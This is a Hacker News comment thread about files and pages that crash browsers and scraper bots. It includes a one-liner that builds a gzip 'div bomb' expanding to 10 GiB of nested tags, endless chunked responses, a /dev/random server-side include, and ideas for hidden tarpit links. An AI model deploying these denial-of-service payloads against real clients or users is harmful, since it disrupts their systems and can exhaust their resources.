Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Back when I was a stupid kid, I once did

    ln -s /dev/zero index.html
on my home page as a joke. Browsers at the time didn’t like that, they basically froze, sometimes taking the client system down with them.

Later on, browsers started to check for actual content I think, and would abort such requests.



I made a 64kx64k JPEG once by feeding the encoder the same line of macro blocks until it produce the entire image.

Years later I was finally able to open it.


I had a ton of trouble opening a 10MB or so png a few weeks back. It was stitched together screenshots forming a map of some areas in a game, so it was quite large. Some stuff refused to open it at all as if the file was invalid, some would hang for minutes, some opened blurry. My first semi-success was Fossify Gallery on my phone from F-Droid. If I let it chug a bit, it'd show a blurry image, a while longer it'd focus. Then I'd try to zoom or pan and it'd blur for ages again. I guess it was aggressively lazy-loading. What worked in the end was GIMP. I had the thought that the image was probably made in an editor, so surely an editor could open it. The catch is that it took like 8GB of RAM, but then I could see clearly, zoom, and pan all I wanted. It made me wonder why there's not an image viewer that's just the viewer part of GIMP or something.

Among things that didn't work were qutebrowser, icecat, nsxiv, feh, imv, mpv. I did worry at first the file was corrupt, I was redownloading it, comparing hashes with a friend, etc. Makes for an interesting benchmark, I guess.

For others curious, here's the file: https://0x0.st/82Ap.png

I'd say just curl/wget it, don't expect it to load in a browser.


That's a 36,000x20,000 PNG, 720 megapixels. Many decoders explicitly limit the maximum image area they'll handle, under the reasonable assumption that it will exceed available RAM and take too long, and assume the file was crafted maliciously or by mistake.


On Firefox on Android on my pretty old phone, a blurry preview rendered in about 10 seconds, and it was fully rendered in 20 something seconds. Smooth panning and zooming the entire time


Firefox on a Samsung S23 Ultra did it a few seconds faster but otherwise the same experience


Following up with Firefox on S24 Ultra loaded from blank to image in a second and then could zoom right in fine with no blurriness or stuttering at all!


I use honey view for reading comics etc. It can handle this.

Old school acdsee would have been fine too.

I think it's all the pixel processing on the modern image viewers (or they're just using system web views that isn't 100% just a straight render).

I suspect that the more native renderers are doing some extra magic here. Or just being significantly more OK with using up all your ram.


It loads in about 5 seconds on an iPhone 12 using safari.

It also pans and zooms swiftly


Same, right up until I zoomed in and waited for Safari to produce a higher resolution render.

Partially zoomed in was fine, but zooming to maximum fidelity resulted in the tab crashing (it was completely responsive until the crash). Looks like Safari does some pretty smart progressive rendering, but forcing it to render the image at full resolution (by zooming in) causes the render to get OOMed or similar.


I remember that years ago (mobile) Safari would aggressively use GPU layers and crash if you ran out of GPU memory. Maybe that's still happening?

Preview on a mac handles the file fine.


How strange, took at least 30s to load on my iPhone 12 Pro Max with Safari but it was smooth to pan and zoom after. Which is way better than my 16 core 64GB RAM Windows machine where both Chrome and Edge gave up very quickly, with a "broken thumbnail" icon.


Probably because they're based on the same engine.


The strangeness was that 2 iPhones from the same generation would exhibit such different performance behaviors, and in parallel the irony that a desktop browser (engine irrelevant) on a device with cutting edge performance can't do what a phone does.


IrfanView was able to load it in about 8 seconds (Ryzen 7 5800x) using 2.8GB of RAM, but zooming/panning is quite slow (~500ms per action)


IrfanView on my PC is very fast. Zoomed to 100% I can pan around no problem. Is it using CPU or GPU? I've got an 11900K CPU and RTX 3090.


There's fast and slow resample viewing options in Irfanview, he may have slow turned on for higher quality.


Firefox on a mid-tier Samsung and a cheapo data connection (4G) took avout 30s to load. I could pan, but it limited me from zooming much, and the little I could zoom in looked quite blury.


For what it's worth, this loaded (slowly) in Firefox on Windows for me (but zooming was blurry), and the default Photos viewer opened it no problem with smooth zooming and panning.


On my Waterfox 6.5.6, it opened but remained blurry when zoomed in. MS Paint refused to open it. The GIMP v2.99.18 crashed and took my display driver with it. Windows 10 Photo Viewer surprisingly managed to open it and keep it sharp when zoomed in. The GIMP v3.0.2 (latest version at the time of writing) crashed.


Safari on my MacBook Air opened it fine, though it took about four seconds. Zooming works fine as well. It does take ~3GB of memory according to Activity Monitor.


ImgurViewer from fdroid on an FP5 opened it blurry after around 5s and 5s later it was rendered completely.

Pan&zoom works instantly with a blurry preview and then takes another 5-10s to render completely.


> don't expect it to load in a browser

Takes a few seconds, but otherwise seems pretty ok in desktop Safari. Preview.app also handles it fine (albeit does allocate an extra ~1-2GB of RAM)


Interestingly enough, it loads in about 5 seconds on my Pixel 6a.


Loads fine and fairly quickly on a Macbook Pro M3 Pro with Firefox 137. Does have a bit of delay when initially zooming in, but pans and zooms fine after.


Works fine on my 5 year old iPad Pro with an A12 processor.


PDF files with included vector-based layers, e.g. plans or maps of large area, are also quite difficult to render/open.


Just today collegue was looking at some air traffic permit map within PDF that was like 12MB or something around that. Complained about Adobe Reader changing something so he cannot pan/zoom no more.

I suggested to try the HN beloved Sumatra PDF. Ugh, it couldn't cope with it normally. Chrome did it better coped better.


Loading this on my iPhone on 1gbit took about 5s and I can easily pan and zoom. A desktop should handle it beautifully.


It loaded after 10-15 seconds on myiPad Pro M1, although it did start reloading after I looked around in it.


It loads in about 10 seconds in Safari on an M1 Air. I think I am spoiled.


Oh hey it's the thing that ruins an otherwise okay rhythm game.


I get a Your connection was interrupted on Chrome.


on mobile Brave just displayed it as the placeholder broken link image but in Firefox it loaded in about 10s


qView opens this easily enough.


Opens fine in Firefox 138.


Safari on iPhone did a good job with it actually lol


I once encoded an entire TV OP into a multi-megabyte animated cursor (.ani) file.

Surprisingly, Windows 95 didn't die trying to load it, but quite a lot of operations in the system took noticeably longer than they normally did.


I wonder if I could create a 500TB html file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and if I could instruct the server to not report file size before download.

Any ideeas?


Why use squashfs when you can do the same OP did and serve a compressed version, so that the client is overwhelmed by both the uncompression and the DOM depth:

yes "<div>"|dd bs=1M count=10240 iflag=fullblock|gzip | pv > zipdiv.gz

Resulting file is about 15 mib long and uncompresses into a 10 gib monstrosity containing 1789569706 unclosed nested divs


You can also just use code to endlessly serve up something.

Also you can reverse many DoD vectors depending on how you are setup and costs. For example reverse Slowloris attack and use up their connections.


I like it. :)


This is beautiful


Yes, servers can respond without specifying the size by using chunked encoding. And you can do the rest with a custom web server that just handles request by returning "<div>" in a loop. I have no idea if browsers are vulnerable to such a thing.


I just tested it via a small python script sending divs at a rate of ~900mb (as measured by curl) and firefox just kills the request after 1-2 gb received (~2 seconds) with an "out of memory" error, while chrome seems to only receive around 1mb/s, uses 1 cpu core 100%, and grows infinitely in memory use. I killed it after 3 mins and consuming ca. 6GB (additionally, on top of the memory it used at startup)


What did the bots do?


I would make it an invisible link from the main page (hidden behind a logo or something). Users won't click it, but bots will.


the problem with this is that for a tarpit, you just don't want to make it expensive for bots, you also want to make it cheap for yourself. this isn't cheap for you. a zip bomb is.


Right, so an invisible link + a zipbomb is da bomb.


maybe, maybe not. it's one tool at your disposal. it's easy to guard against zip bombs if you know about them - the question is, how thorough are the bot devs you're targeting?

there are other techniques. for example: hold a connection open and only push out a few bytes every few seconds - whether that's cheap for you or not depends on your servers concurrency model (if it's 1 OS thread per connection, then you'd DOS yourself with this - but with an evented model you should be good). if the bot analyzes images or pdfs you could try toxic files that exploit known weaknesses which lead to memory corruption to crash them; depends on the bots capabilities and used libraries of course.


Sounds like the favicon.ico that would crash the browser.

I think this was it:

https://freedomhacker.net/annoying-favicon-crash-bug-firefox...


Looks like something I should add for my web APIs which are to be queried only by clients aware of the API specification.


I hope you weren’t paying for bandwidth by the KiB.


Nah, back then we paid for bandwidth by the kb.


That’s even worse! :)


Maybe it's time for a /dev/zipbomb device.


ln -s /dev/urandom /dev/zipbomb && echo 'Boom!'

Ok, not a real zip bomb, for that we would need a kernel module.


> Ok, not a real zip bomb, for that we would need a kernel module.

Or a userland fusefs program, nice funky idea actually (with configurable dynamic filenames, e.g. `mnt/10GiB_zeropattern.zip`...


That costs you a lot of bandwidth, defeating the whole point of a zip bomb.


Wait, you set up a symlink?

I am not sure how that could’ve worked. Unless the real /dev tree was exposed to your webserver’s chroot environment, this would’ve given nothing special except “file not found”.

The whole point of chroot for a webserver was to shield clients from accessing special files like that!


You yourself explain how it could've worked: Plenty of webservers are or were not chroot'ed.


Which means that if your bot is getting slammed by this, you can assume it's not chrooted and hence a more likely target for attack.


This does not logically follow. If your bot is getting slammed by a page returning all zeros (what the person I replied to reacted to), all you know is something on the server is returning a neverending stream of zeros. A symlink to /dev/zero is an easy way of doing that, but knowing the server is serving up a neverending stream of zeros by no means tells you whether the server is running in a decently isolated environment or not.

Even if you knew it was done with a symlink you don't know that - these days odds are it'd run in a container or vm, and so having access to /dev/zero means very little.


Could server-side includes be used for a html bomb?

Write an ordinary static html page and fill a <p> with infinite random data using <!--#include file="/dev/random"-->.

or would that crash the server?


I guess it depends on the server's implementation. but, since you need some logic to decide when to serve the html bomb anyway, I don't see why you would prefer this solution. Just use whatever script you're using to detect the bots to serve the bomb.


No other scripts. Hide the link to the bomb behind an image so humans can't click it.


My first thought is how this would interact with things like screen readers and other accessibility devices


Don’t screen readers ignore invisible text/links?


Devide by zero happens to everyone eventually.

https://medium.com/@bishr_tabbaa/when-smart-ships-divide-by-...

"On 21 September 1997, the USS Yorktown halted for almost three hours during training maneuvers off the coast of Cape Charles, Virginia due to a divide-by-zero error in a database application that propagated throughout the ship’s control systems."

" technician tried to digitally calibrate and reset the fuel valve by entering a 0 value for one of the valve’s component properties into the SMCS Remote Database Manager (RDM)"


I remember reading about that some years ago. It involved Windows NT.

https://www.google.com/search?q=windows+nt+bug+affects+ship


Bad bot


we discovered back when IE3 came out that you could crash windows by leaving off a table closing tag.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: